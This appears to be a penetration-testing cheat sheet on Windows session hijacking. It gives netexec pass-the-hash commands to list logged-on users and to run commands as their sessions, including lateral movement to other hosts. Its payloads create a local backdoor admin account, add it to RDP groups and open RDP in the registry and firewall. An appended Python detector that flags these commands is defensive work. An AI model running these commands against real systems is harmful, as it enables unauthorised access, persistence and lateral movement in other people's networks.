Session Hijack

Windows

Session hijacking in Windows is a powerful and easy way to pivot deeper into the AD environment.

Find logged-in users

## Remotely using `netexec`
$ netexec smb <target> -u Administrator -H :<pw-hash> --local-auth --loggedon-users
...
SMB         <target>   445    <hostname>   [+] Enumerated logged_on users
SMB         <target>   445    <hostname>   DOM\username             logon_server: DC.DOM.LOCAL

## Locally using cmd/powershell
> query user /server:127.0.0.1
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 void                  console             2  Active      none   2024-10-14 07:29

> qwinsta /server:127.0.0.1
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           void                      2  Active

Base command

## Execute command on target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"<command>\""

## Execute command on new target host
netexec smb <target> -u Administrator -H :<pw-hash> --local-auth -M schtask_as -o USER=<user-to-hijack> CMD="powershell.exe \"Invoke-Command -ComputerName <new-target-host> -ScriptBlock {<command>}\""

Useful payloads

## Create new local user
net user <username> <password> /add

## Add to groups
net localgroup Administrators <username> /add
net localgroup 'Remote Desktop Users' <username> /add
net localgroup 'Remote Management Users' <username> /add

## Enable RDP
reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name='allow RemoteDesktop' dir=in protocol=TCP localport=3389 action=allow
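From the detection side, as an added example that is not part of this cheat sheet: a small Python scan over constructed process-creation records that flags each of the payloads above and raises a combined alert when one account creates a local user, adds it to a privileged group and enables RDP on the same host. The record format, the host and user names and the rule labels are assumptions made for the example.

```python
import re

# Constructed sample records in a simplified, hypothetical process-creation log
# format ("<timestamp> host=<h> user=<u> cmd=<command line>"); not real telemetry.
SAMPLE_LOG = """\
2024-10-14T07:31:02 host=WS01 user=DOM\\void cmd=net user backup_svc P@ssw0rd /add
2024-10-14T07:31:05 host=WS01 user=DOM\\void cmd=net localgroup Administrators backup_svc /add
2024-10-14T07:31:09 host=WS01 user=DOM\\void cmd=reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2024-10-14T07:31:12 host=WS01 user=DOM\\void cmd=netsh advfirewall firewall add rule name="rdp" dir=in protocol=TCP localport=3389 action=allow
2024-10-14T07:35:00 host=WS01 user=DOM\\void cmd=notepad.exe report.txt
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")

# One rule per payload from the cheat sheet; the rule names are our own labels.
GROUPS = r"(Administrators|Remote Desktop Users|Remote Management Users)"
RULES = [
    ("local-user-created", re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("privileged-group-add", re.compile(r"\bnet1?\s+localgroup\s+['\"]?" + GROUPS + r"['\"]?\s+\S+\s+/add\b", re.I)),
    ("rdp-enabled-via-registry", re.compile(r"\breg\s+add\b.*Terminal Server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("firewall-opened-3389", re.compile(r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*localport=3389\b.*action=allow", re.I)),
]
CHAIN = {"local-user-created", "privileged-group-add", "rdp-enabled-via-registry"}

def match_rules(cmd):
    """Names of every rule whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(log_text):
    """Parse each record; keep only those that trip at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort the whole scan
        hits = match_rules(m["cmd"])
        if hits:
            findings.append({**m.groupdict(), "rules": hits})
    return findings

def summarize(findings):
    """Group hits per (host, user); flag when the full user->group->RDP chain is present."""
    out = {}
    for f in findings:
        entry = out.setdefault((f["host"], f["user"]), {"rules": set(), "rdp_backdoor_chain": False})
        entry["rules"].update(f["rules"])
        entry["rdp_backdoor_chain"] = CHAIN <= entry["rules"]
    return out
```

Real process-creation telemetry (e.g. command-line auditing from the endpoint) would be fed in place of the constructed records; the rules deliberately match the commands whether they are typed in cmd or wrapped in powershell.exe.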

Web

Session cookies: find them and use them.
